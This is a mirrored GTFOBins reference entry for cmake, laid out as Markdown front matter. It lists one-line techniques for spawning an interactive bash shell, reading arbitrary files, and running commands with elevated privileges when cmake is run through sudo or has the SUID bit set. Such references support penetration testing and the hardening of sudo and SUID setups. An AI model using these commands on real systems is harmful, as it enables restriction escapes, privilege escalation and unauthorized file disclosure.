mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-24 04:22:52 +01:00
24 lines
880 B
Markdown
24 lines
880 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- description: It can be used to break out from a restricted environment by spawning an interactive system shell.
|
|
code: |
|
|
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
|
|
cmake .
|
|
file-read:
|
|
- description: It can read files, and may be used to perform privileged reads or discloe files outside a restrited file system
|
|
code: |
|
|
LFILE=file_to_read
|
|
cmake -E cat $LFILE
|
|
|
|
limited-suid:
|
|
- description: It can perform execution in a privileged context, given the SUID bit is set
|
|
code: |
|
|
echo "execute_process(COMMAND whoami)" > CMakeLists.txt
|
|
cmake .
|
|
sudo:
|
|
- description: It can perform execution in a privileged context, given the user can run the binary with sudo
|
|
code: |
|
|
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
|
|
sudo cmake .
|
|
--- |